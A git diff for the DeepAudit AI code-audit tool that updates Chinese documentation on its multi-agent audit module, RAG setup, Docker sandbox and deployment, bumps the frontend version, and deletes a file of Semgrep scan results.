@@ -103,93 +129,60 @@ Agent 审计模块是 DeepAudit 的高级安全审计功能,基于 **LangGraph | `safety_scan` | Safety Python 审计 | Python 依赖漏洞 | | `osv_scan` | OSV 漏洞扫描 | 多语言依赖漏洞 | -### 3. RAG 系统 +--- + +## RAG 系统 + +### 功能特点 - **代码分块**: 基于 Tree-sitter AST 的智能分块 -- **向量存储**: ChromaDB 持久化 +- **向量存储**: Milvus 或 ChromaDB 持久化 - **多语言支持**: Python, JavaScript, TypeScript, Java, Go, PHP, Rust 等 -- **嵌入模型**: 独立配置,支持 OpenAI、Ollama、Cohere、HuggingFace +- **知识库增强**: 支持上传自定义漏洞知识库 -### 4. 安全沙箱 +### 配置 -- **Docker 隔离**: 安全容器执行 +```env +# 嵌入模型配置 +EMBEDDING_PROVIDER=openai +EMBEDDING_MODEL=text-embedding-3-small + +# 向量数据库配置 +VECTOR_DB_TYPE=milvus +MILVUS_HOST=milvus +MILVUS_PORT=19530 +``` + +--- + +## 安全沙箱 + +### 功能特点 + +- **Docker 隔离**: 安全容器执行 PoC - **资源限制**: 内存、CPU 限制 - **网络隔离**: 可配置网络访问 - **seccomp 策略**: 系统调用白名单 -## 配置 +### 配置 -### 环境变量 - -```bash -# LLM 配置 -DEFAULT_LLM_MODEL=gpt-4-turbo-preview -LLM_API_KEY=your-api-key -LLM_BASE_URL=https://api.openai.com/v1 - -# 嵌入模型配置(独立于 LLM) -EMBEDDING_PROVIDER=openai -EMBEDDING_MODEL=text-embedding-3-small - -# 向量数据库 -VECTOR_DB_PATH=./data/vectordb - -# 沙箱配置 +```env +SANDBOX_ENABLED=true SANDBOX_IMAGE=deepaudit-sandbox:latest SANDBOX_MEMORY_LIMIT=512m SANDBOX_CPU_LIMIT=1.0 SANDBOX_NETWORK_DISABLED=true ``` -### Agent 任务配置 +### 沙箱镜像内置工具 -```json -{ - "target_vulnerabilities": [ - "sql_injection", - "xss", - "command_injection", - "path_traversal", - "ssrf" - ], - "verification_level": "sandbox", - "exclude_patterns": ["node_modules", "__pycache__", ".git"], - "max_iterations": 3, - "timeout_seconds": 1800 -} -``` +- Python 3.11 + Semgrep, Bandit, Safety +- Node.js 20 + npm audit +- Go 1.21 + OSV-Scanner +- Rust + cargo-audit +- Gitleaks, TruffleHog -## 部署 - -### 1. 安装依赖 - -```bash -cd backend -pip install -r requirements.txt - -# 可选:安装外部工具 -pip install semgrep bandit safety -brew install gitleaks trufflehog osv-scanner # macOS -``` - -### 2. 构建沙箱镜像 - -```bash -cd docker/sandbox -./build.sh -``` - -### 3. 数据库迁移 - -```bash -alembic upgrade head -``` - -### 4. 
启动服务 - -```bash -uvicorn app.main:app --host 0.0.0.0 --port 8000 -``` +--- ## API 接口 @@ -227,6 +220,14 @@ GET /api/v1/agent-tasks/{task_id}/findings?verified_only=true GET /api/v1/agent-tasks/{task_id}/summary ``` +### 导出报告 + +```http +GET /api/v1/agent-tasks/{task_id}/report?format=markdown +``` + +--- + ## 支持的漏洞类型 | 类型 | 说明 | @@ -244,6 +245,8 @@ GET /api/v1/agent-tasks/{task_id}/summary | `authorization_bypass` | 授权绕过 | | `idor` | 不安全直接对象引用 | +--- + ## 目录结构 ``` @@ -257,11 +260,6 @@ backend/app/services/agent/ │ ├── analysis.py # 漏洞分析 Agent │ ├── verification.py # 漏洞验证 Agent │ └── orchestrator.py # 编排 Agent -├── graph/ # LangGraph 工作流 -│ ├── __init__.py -│ ├── audit_graph.py # 状态定义和图构建 -│ ├── nodes.py # 节点实现 -│ └── runner.py # 执行器 ├── tools/ # Agent 工具 │ ├── __init__.py │ ├── base.py # 工具基类 @@ -276,23 +274,65 @@ backend/app/services/agent/ └── system_prompts.py ``` +--- + ## 故障排除 -### 沙箱镜像检查 +### 常见问题 + +**Q: Agent 审计启动失败** ```bash +# 检查服务状态 +docker compose --profile agent ps + +# 查看后端日志 +docker compose logs backend | grep -i agent +``` + +**Q: RAG 初始化失败** + +```bash +# 检查 Milvus 连接 +curl http://localhost:9091/healthz + +# 检查嵌入模型配置 +# 确保 EMBEDDING_API_KEY 正确设置 +``` + +**Q: 沙箱执行失败** + +```bash +# 检查沙箱镜像 docker images | grep deepaudit-sandbox + +# 重新构建沙箱 +cd docker/sandbox && ./build.sh +``` + +**Q: 外部工具不可用** + +```bash +# 检查工具安装(本地开发时) +which semgrep bandit gitleaks + +# 或使用 Docker 沙箱执行 ``` ### 日志查看 ```bash +# 查看 Agent 日志 +docker compose logs -f backend | grep -E "(agent|Agent)" + +# 查看详细日志 tail -f logs/agent.log ``` -### 常见问题 +--- -1. **RAG 初始化失败**: 检查嵌入模型配置和 API Key -2. **沙箱启动失败**: 确保 Docker 正常运行 -3. **外部工具不可用**: 检查 semgrep/bandit 等是否已安装 +## 更多资源 +- [部署指南](DEPLOYMENT.md) - 完整部署说明 +- [配置说明](CONFIGURATION.md) - 详细配置参数 +- [架构详解](AGENT_AUDIT_ARCHITECTURE.md) - 深度架构文档 diff --git a/docs/DEPLOYMENT.md b/docs/DEPLOYMENT.md index cc0e336..7dc490e 100644 --- a/docs/DEPLOYMENT.md +++ b/docs/DEPLOYMENT.md 
@@ -1,11 +1,12 @@
 # 部署指南
-本文档详细介绍 DeepAudit 的各种部署方式,包括 Docker Compose 一键部署、生产环境部署和本地开发环境搭建。
+本文档详细介绍 DeepAudit v3.0.0 的各种部署方式,包括 Docker Compose 一键部署、Agent 审计模式部署和本地开发环境搭建。
 ## 目录
 - [快速开始](#快速开始)
 - [Docker Compose 部署(推荐)](#docker-compose-部署推荐)
+- [Agent 审计模式部署](#agent-审计模式部署)
 - [生产环境部署](#生产环境部署)
 - [本地开发部署](#本地开发部署)
 - [常见部署问题](#常见部署问题)
@@ -50,10 +51,12 @@ docker compose up -d
 ### 系统要求
-- Docker 20.10+
-- Docker Compose 2.0+
-- 至少 2GB 可用内存
-- 至少 5GB 可用磁盘空间
+| 资源 | 基础模式 | Agent 模式 |
+|------|----------|-----------|
+| 内存 | 2GB+ | 4GB+ |
+| 磁盘 | 5GB+ | 10GB+ |
+| Docker | 20.10+ | 20.10+ |
+| Docker Compose | 2.0+ | 2.0+ |
 ### 部署步骤
@@ -102,8 +105,8 @@ docker compose logs -f
 | 服务 | 端口 | 说明 |
 |------|------|------|
-| `frontend` | 3000 | React 前端应用(生产构建,使用 serve 提供静态文件) |
-| `backend` | 8000 | FastAPI 后端 API(使用 uv 管理依赖) |
+| `frontend` | 3000 | React 前端应用(生产构建) |
+| `backend` | 8000 | FastAPI 后端 API |
 | `db` | 5432 | PostgreSQL 15 数据库 |
 ### 访问地址
@@ -135,6 +138,91 @@ docker compose exec db psql -U postgres -d deepaudit
 ---
+## Agent 审计模式部署
+
+v3.0.0 新增的 Multi-Agent 深度审计功能,需要额外的服务支持。
+
+### 功能特点
+
+- 🤖 **Multi-Agent 架构**: Orchestrator/Analysis/Recon/Verification 多智能体协作
+- 🧠 **RAG 知识库**: 代码语义理解 + CWE/CVE 漏洞知识库
+- 🔒 **沙箱验证**: Docker 安全容器执行 PoC
+
+### 部署步骤
+
+```bash
+# 1. 配置 Agent 相关参数
+# 编辑 backend/.env,确保以下配置正确
+
+# Agent 配置
+AGENT_ENABLED=true
+AGENT_MAX_ITERATIONS=5
+
+# 嵌入模型配置
+EMBEDDING_PROVIDER=openai
+EMBEDDING_MODEL=text-embedding-3-small
+EMBEDDING_API_KEY= # 留空则使用 LLM_API_KEY
+
+# 向量数据库配置(使用 Milvus)
+VECTOR_DB_TYPE=milvus
+MILVUS_HOST=milvus
+MILVUS_PORT=19530
+
+# 沙箱配置
+SANDBOX_ENABLED=true
+```
+
+```bash
+# 2. 启动包含 Agent 服务的完整部署
+docker compose --profile agent up -d
+```
+
+### Agent 模式服务说明
+
+| 服务 | 端口 | 说明 |
+|------|------|------|
+| `milvus` | 19530 | Milvus 向量数据库 |
+| `milvus-etcd` | - | Milvus 元数据存储 |
+| `milvus-minio` | - | Milvus 对象存储 |
+| `redis` | 6379 | 任务队列(可选) |
+
+### 构建安全沙箱镜像
+
+沙箱用于安全地执行漏洞验证 PoC:
+
+```bash
+# 进入沙箱目录
+cd docker/sandbox
+
+# 构建沙箱镜像
+./build.sh
+
+# 验证镜像构建成功
+docker images | grep deepaudit-sandbox
+```
+
+沙箱镜像包含:
+- Python 3.11 + 安全工具 (Semgrep, Bandit, Safety)
+- Node.js 20 + npm audit
+- Go 1.21 + gosec
+- Rust (cargo-audit)
+- Gitleaks, TruffleHog, OSV-Scanner
+
+### 验证 Agent 模式
+
+```bash
+# 检查所有服务状态
+docker compose --profile agent ps
+
+# 检查 Milvus 连接
+curl http://localhost:9091/healthz
+
+# 查看 Agent 日志
+docker compose logs -f backend | grep -i agent
+```
+
+---
+
 ## 生产环境部署
 Docker Compose 默认配置已适用于生产环境:
@@ -186,6 +274,16 @@ server {
 proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
 proxy_set_header X-Forwarded-Proto $scheme;
 }
+
+ # SSE 事件流(Agent 审计日志)
+ location /api/v1/agent-tasks/ {
+ proxy_pass http://localhost:8000/api/v1/agent-tasks/;
+ proxy_http_version 1.1;
+ proxy_set_header Connection "";
+ proxy_buffering off;
+ proxy_cache off;
+ proxy_read_timeout 86400;
+ }
 }
@@ -347,6 +445,33 @@ docker compose up -d backend
 3. 重启 Docker Desktop
 4. 重新构建:`docker compose build --no-cache`
+### Agent 模式相关
+
+**Q: Milvus 启动失败**
+
+```bash
+# 检查 Milvus 相关服务状态
+docker compose --profile agent ps
+
+# 查看 Milvus 日志
+docker compose logs milvus milvus-etcd milvus-minio
+
+# 重新启动 Milvus 服务
+docker compose --profile agent restart milvus
+```
+
+**Q: 沙箱镜像构建失败**
+
+```bash
+# 检查 Docker 服务状态
+docker info
+
+# 使用国内镜像源重新构建
+cd docker/sandbox
+# 编辑 Dockerfile,使用国内镜像源
+./build.sh
+```
+
 ### 后端相关
 **Q: PDF 导出功能报错(WeasyPrint 依赖问题)**
@@ -395,6 +520,7 @@ VITE_API_BASE_URL=http://localhost:8000/api/v1
 ## 更多资源
 - [配置说明](CONFIGURATION.md) - 详细的配置参数说明
+- [Agent 审计](AGENT_AUDIT.md) - Multi-Agent 审计模块详解
 - [LLM 平台支持](LLM_PROVIDERS.md) - 各 LLM 平台的配置方法
 - [常见问题](FAQ.md) - 更多问题解答
 - [贡献指南](../CONTRIBUTING.md) - 参与项目开发
diff --git a/frontend/package.json b/frontend/package.json
index c5a9e9a..0561af0 100644
--- a/frontend/package.json
+++ b/frontend/package.json
@@ -1,6 +1,6 @@
 {
 "name": "deep-audit",
- "version": "2.0.0-beta.7",
+ "version": "3.0.0",
 "type": "module",
 "scripts": {
 "dev": "vite",
@@ -104,4 +104,4 @@
 "react": "^16.8.0 || ^17 || ^18 || ^19"
 }
 }
-}
+}
\ No newline at end of file
diff --git a/semgrep_results.json b/semgrep_results.json
deleted file mode 100644
index 60eb658..0000000
--- a/semgrep_results.json
+++ /dev/null
@@ -1 +0,0 @@ -{"version":"1.145.0","results":[{"check_id":"dockerfile.security.missing-user.missing-user","path":"/Users/lintsinghua/XCodeReviewer/backend/Dockerfile","start":{"line":57,"col":1,"offset":1424},"end":{"line":57,"col":71,"offset":1494},"extra":{"message":"By not specifying a USER, a program in the container may run as 'root'. This is a security hazard. If an attacker can control a process running as root, they may have control over the container. Ensure that the last USER in a Dockerfile is a USER other than 'root'.","fix":"USER non-root\nCMD [\"uvicorn\", \"app.main:app\", \"--host\", \"0.0.0.0\", \"--port\", \"8000\"]","metadata":{"cwe":["CWE-250: Execution with Unnecessary Privileges"],"category":"security","technology":["dockerfile"],"confidence":"MEDIUM","owasp":["A04:2021 - Insecure Design"],"references":["https://owasp.org/Top10/A04_2021-Insecure_Design"],"subcategory":["audit"],"likelihood":"LOW","impact":"MEDIUM","license":"Semgrep Rules License v1.0. For more details, visit semgrep.dev/legal/rules-license","vulnerability_class":["Improper Authorization"],"source":"https://semgrep.dev/r/dockerfile.security.missing-user.missing-user","shortlink":"https://sg.run/Gbvn"},"severity":"ERROR","fingerprint":"requires login","lines":"requires login","validation_state":"NO_VALIDATOR","engine_kind":"OSS"}},{"check_id":"python.sqlalchemy.performance.performance-improvements.len-all-count","path":"/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/database.py","start":{"line":624,"col":34,"offset":23582},"end":{"line":626,"col":36,"offset":23719},"extra":{"message":"Using QUERY.count() instead of len(QUERY.all()) sends less data to the client since the SQLAlchemy method is performed server-side.","metadata":{"category":"performance","technology":["sqlalchemy"],"license":"Semgrep Rules License v1.0. 
For more details, visit semgrep.dev/legal/rules-license","source":"https://semgrep.dev/r/python.sqlalchemy.performance.performance-improvements.len-all-count","shortlink":"https://sg.run/4y8g"},"severity":"WARNING","fingerprint":"requires login","lines":"requires login","validation_state":"NO_VALIDATOR","engine_kind":"OSS"}},{"check_id":"python.sqlalchemy.performance.performance-improvements.len-all-count","path":"/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/database.py","start":{"line":628,"col":31,"offset":23767},"end":{"line":630,"col":36,"offset":23910},"extra":{"message":"Using QUERY.count() instead of len(QUERY.all()) sends less data to the client since the SQLAlchemy method is performed server-side.","metadata":{"category":"performance","technology":["sqlalchemy"],"license":"Semgrep Rules License v1.0. For more details, visit semgrep.dev/legal/rules-license","source":"https://semgrep.dev/r/python.sqlalchemy.performance.performance-improvements.len-all-count","shortlink":"https://sg.run/4y8g"},"severity":"WARNING","fingerprint":"requires login","lines":"requires login","validation_state":"NO_VALIDATOR","engine_kind":"OSS"}},{"check_id":"python.sqlalchemy.performance.performance-improvements.len-all-count","path":"/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/database.py","start":{"line":632,"col":34,"offset":23961},"end":{"line":634,"col":36,"offset":24113},"extra":{"message":"Using QUERY.count() instead of len(QUERY.all()) sends less data to the client since the SQLAlchemy method is performed server-side.","metadata":{"category":"performance","technology":["sqlalchemy"],"license":"Semgrep Rules License v1.0. 
For more details, visit semgrep.dev/legal/rules-license","source":"https://semgrep.dev/r/python.sqlalchemy.performance.performance-improvements.len-all-count","shortlink":"https://sg.run/4y8g"},"severity":"WARNING","fingerprint":"requires login","lines":"requires login","validation_state":"NO_VALIDATOR","engine_kind":"OSS"}},{"check_id":"python.fastapi.security.wildcard-cors.wildcard-cors","path":"/Users/lintsinghua/XCodeReviewer/backend/app/main.py","start":{"line":59,"col":19,"offset":1793},"end":{"line":59,"col":24,"offset":1798},"extra":{"message":"CORS policy allows any origin (using wildcard '*'). This is insecure and should be avoided.","metadata":{"cwe":["CWE-942: Permissive Cross-domain Policy with Untrusted Domains"],"owasp":["A05:2021 - Security Misconfiguration"],"category":"security","technology":["python","fastapi"],"references":["https://owasp.org/Top10/A05_2021-Security_Misconfiguration","https://cwe.mitre.org/data/definitions/942.html"],"likelihood":"HIGH","impact":"LOW","confidence":"MEDIUM","vulnerability_class":["Configuration"],"subcategory":["vuln"],"license":"Semgrep Rules License v1.0. For more details, visit semgrep.dev/legal/rules-license","source":"https://semgrep.dev/r/python.fastapi.security.wildcard-cors.wildcard-cors","shortlink":"https://sg.run/KxApY"},"severity":"WARNING","fingerprint":"requires login","lines":"requires login","validation_state":"NO_VALIDATOR","engine_kind":"OSS"}},{"check_id":"python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2","path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/report_generator.py","start":{"line":432,"col":24,"offset":14717},"end":{"line":432,"col":50,"offset":14743},"extra":{"message":"Detected direct use of jinja2. If not done properly, this may bypass HTML escaping which opens up the application to cross-site scripting (XSS) vulnerabilities. 
Prefer using the Flask method 'render_template()' and templates with a '.html' extension in order to prevent XSS.","metadata":{"cwe":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')"],"owasp":["A07:2017 - Cross-Site Scripting (XSS)","A03:2021 - Injection"],"references":["https://jinja.palletsprojects.com/en/2.11.x/api/#basics"],"category":"security","technology":["flask"],"cwe2022-top25":true,"cwe2021-top25":true,"subcategory":["audit"],"likelihood":"LOW","impact":"MEDIUM","confidence":"LOW","license":"Semgrep Rules License v1.0. For more details, visit semgrep.dev/legal/rules-license","vulnerability_class":["Cross-Site-Scripting (XSS)"],"source":"https://semgrep.dev/r/python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2","shortlink":"https://sg.run/RoKe"},"severity":"WARNING","fingerprint":"requires login","lines":"requires login","validation_state":"NO_VALIDATOR","engine_kind":"OSS"}}],"errors":[],"paths":{"scanned":["/Users/lintsinghua/XCodeReviewer/backend/.dockerignore","/Users/lintsinghua/XCodeReviewer/backend/.gitignore","/Users/lintsinghua/XCodeReviewer/backend/.python-version","/Users/lintsinghua/XCodeReviewer/backend/Dockerfile","/Users/lintsinghua/XCodeReviewer/backend/README_UV.md","/Users/lintsinghua/XCodeReviewer/backend/UV_MIGRATION.md","/Users/lintsinghua/XCodeReviewer/backend/alembic/env.py","/Users/lintsinghua/XCodeReviewer/backend/alembic/script.py.mako","/Users/lintsinghua/XCodeReviewer/backend/alembic/versions/001_initial.py","/Users/lintsinghua/XCodeReviewer/backend/alembic/versions/004_add_prompts_and_rules.py","/Users/lintsinghua/XCodeReviewer/backend/alembic/versions/006_add_agent_tables.py","/Users/lintsinghua/XCodeReviewer/backend/alembic/versions/5fc1cc05d5d0_add_missing_user_fields.py","/Users/lintsinghua/XCodeReviewer/backend/alembic/versions/73889a94a455_add_is_active_to_projects.py","/Users/lintsinghua/XCodeReviewer/backend/alembic/versions/add_source_type_to_projects.
py","/Users/lintsinghua/XCodeReviewer/backend/alembic.ini","/Users/lintsinghua/XCodeReviewer/backend/app/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/deps.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/api.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/agent_tasks.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/auth.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/config.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/database.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/embedding_config.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/members.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/projects.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/prompts.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/rules.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/scan.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/tasks.py","/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/users.py","/Users/lintsinghua/XCodeReviewer/backend/app/core/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/core/config.py","/Users/lintsinghua/XCodeReviewer/backend/app/core/encryption.py","/Users/lintsinghua/XCodeReviewer/backend/app/core/security.py","/Users/lintsinghua/XCodeReviewer/backend/app/db/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/db/base.py","/Users/lintsinghua/XCodeReviewer/backend/app/db/init_db.py","/Users/lintsinghua/XCodeReviewer/backend/app/db/session.py","/Users/lintsinghua/XCodeReviewer/backend/app/main.py","/Users/lintsinghua/XCodeReviewer/backend/app/models/__init__.py","/Users/lintsinghua/XCodeReviewer/ba
ckend/app/models/agent_task.py","/Users/lintsinghua/XCodeReviewer/backend/app/models/analysis.py","/Users/lintsinghua/XCodeReviewer/backend/app/models/audit.py","/Users/lintsinghua/XCodeReviewer/backend/app/models/audit_rule.py","/Users/lintsinghua/XCodeReviewer/backend/app/models/project.py","/Users/lintsinghua/XCodeReviewer/backend/app/models/prompt_template.py","/Users/lintsinghua/XCodeReviewer/backend/app/models/user.py","/Users/lintsinghua/XCodeReviewer/backend/app/models/user_config.py","/Users/lintsinghua/XCodeReviewer/backend/app/schemas/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/schemas/audit_rule.py","/Users/lintsinghua/XCodeReviewer/backend/app/schemas/prompt_template.py","/Users/lintsinghua/XCodeReviewer/backend/app/schemas/token.py","/Users/lintsinghua/XCodeReviewer/backend/app/schemas/user.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/analysis.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/analysis_v2.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/base.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/orchestrator.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/react_agent.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/recon.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/verification.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/event_manager.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/graph/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/graph/audit_graph.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/graph/nodes.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/graph/runner.py","/Users/lintsinghua/XCodeReviewer/backe
nd/app/services/agent/json_parser.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/prompts/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/prompts/system_prompts.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/streaming/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/streaming/stream_handler.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/streaming/token_streamer.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/streaming/tool_stream.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/base.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/code_analysis_tool.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/external_tools.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/file_tool.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/pattern_tool.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/rag_tool.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/sandbox_tool.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/init_templates.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/llm/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/llm/adapters/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/llm/adapters/baidu_adapter.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/llm/adapters/doubao_adapter.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/llm/adapters/litellm_adapter.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/llm/adapters/minimax_adapter.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/llm/base_adapter.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/llm/factory.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/ll
m/service.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/llm/types.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/rag/__init__.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/rag/embeddings.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/rag/indexer.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/rag/retriever.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/rag/splitter.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/report_generator.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/scanner.py","/Users/lintsinghua/XCodeReviewer/backend/app/services/zip_storage.py","/Users/lintsinghua/XCodeReviewer/backend/data/vector_db/ef6dc788-cc23-4a4d-b1a9-5ce4b32248b8/data_level0.bin","/Users/lintsinghua/XCodeReviewer/backend/data/vector_db/ef6dc788-cc23-4a4d-b1a9-5ce4b32248b8/header.bin","/Users/lintsinghua/XCodeReviewer/backend/data/vector_db/ef6dc788-cc23-4a4d-b1a9-5ce4b32248b8/length.bin","/Users/lintsinghua/XCodeReviewer/backend/data/vector_db/ef6dc788-cc23-4a4d-b1a9-5ce4b32248b8/link_lists.bin","/Users/lintsinghua/XCodeReviewer/backend/env.example","/Users/lintsinghua/XCodeReviewer/backend/main.py","/Users/lintsinghua/XCodeReviewer/backend/pyproject.toml","/Users/lintsinghua/XCodeReviewer/backend/requirements-lock.txt","/Users/lintsinghua/XCodeReviewer/backend/requirements.txt","/Users/lintsinghua/XCodeReviewer/backend/start.sh","/Users/lintsinghua/XCodeReviewer/backend/static/images/logo_nobg.png","/Users/lintsinghua/XCodeReviewer/backend/test_logo.py","/Users/lintsinghua/XCodeReviewer/backend/uploads/.gitkeep","/Users/lintsinghua/XCodeReviewer/backend/uv.lock"]},"time":{"rules":[],"rules_parse_time":1.2000598907470703,"profiling_times":{"config_time":3.0274291038513184,"core_time":37.23275899887085,"ignores_time":0.0010230541229248047,"total_time":40.26207113265991},"parsing_time":{"total_time":0.0,"per_file_time":{"mean":0.0,"std_dev":0.0},"very_slow_stats":{"time_ratio":0.0,"count_
ratio":0.0},"very_slow_files":[]},"scanning_time":{"total_time":234.07624554634094,"per_file_time":{"mean":0.6966554926974439,"std_dev":4.675806630950063},"very_slow_stats":{"time_ratio":0.8731978438340042,"count_ratio":0.10416666666666667},"very_slow_files":[{"fpath":"/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/scan.py","ftime":7.5774359703063965},{"fpath":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/external_tools.py","ftime":8.510899066925049},{"fpath":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/analysis.py","ftime":9.324252128601074},{"fpath":"/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/agent_tasks.py","ftime":10.199949026107788},{"fpath":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/pattern_tool.py","ftime":10.646106958389282},{"fpath":"/Users/lintsinghua/XCodeReviewer/backend/app/services/init_templates.py","ftime":11.258774042129517},{"fpath":"/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/prompts.py","ftime":11.770168781280518},{"fpath":"/Users/lintsinghua/XCodeReviewer/backend/app/services/rag/splitter.py","ftime":11.997308015823364},{"fpath":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/react_agent.py","ftime":12.751168012619019},{"fpath":"/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/projects.py","ftime":16.807862043380737}]},"matching_time":{"total_time":0.0,"per_file_and_rule_time":{"mean":0.0,"std_dev":0.0},"very_slow_stats":{"time_ratio":0.0,"count_ratio":0.0},"very_slow_rules_on_files":[]},"tainting_time":{"total_time":0.0,"per_def_and_rule_time":{"mean":0.0,"std_dev":0.0},"very_slow_stats":{"time_ratio":0.0,"count_ratio":0.0},"very_slow_rules_on_defs":[]},"fixpoint_timeouts":[{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/alembic/versions/006_add_agent_tables.py:19:4 [rules: 1, first: 
python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/alembic/versions/006_add_agent_tables.py","start":{"line":19,"col":5,"offset":370},"end":{"line":19,"col":12,"offset":377}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/agent_tasks.py:203:10 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/agent_tasks.py","start":{"line":203,"col":11,"offset":5475},"end":{"line":203,"col":30,"offset":5494}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/database.py:202:10 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/database.py","start":{"line":202,"col":11,"offset":7486},"end":{"line":202,"col":26,"offset":7501}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/database.py:37:10 [rules: 1, first: python.flask.security.injection.tainted-url-host.tainted-url-host]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/database.py","start":{"line":37,"col":11,"offset":975},"end":{"line":37,"col":26,"offset":990}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/database.py:488:10 [rules: 1, first: 
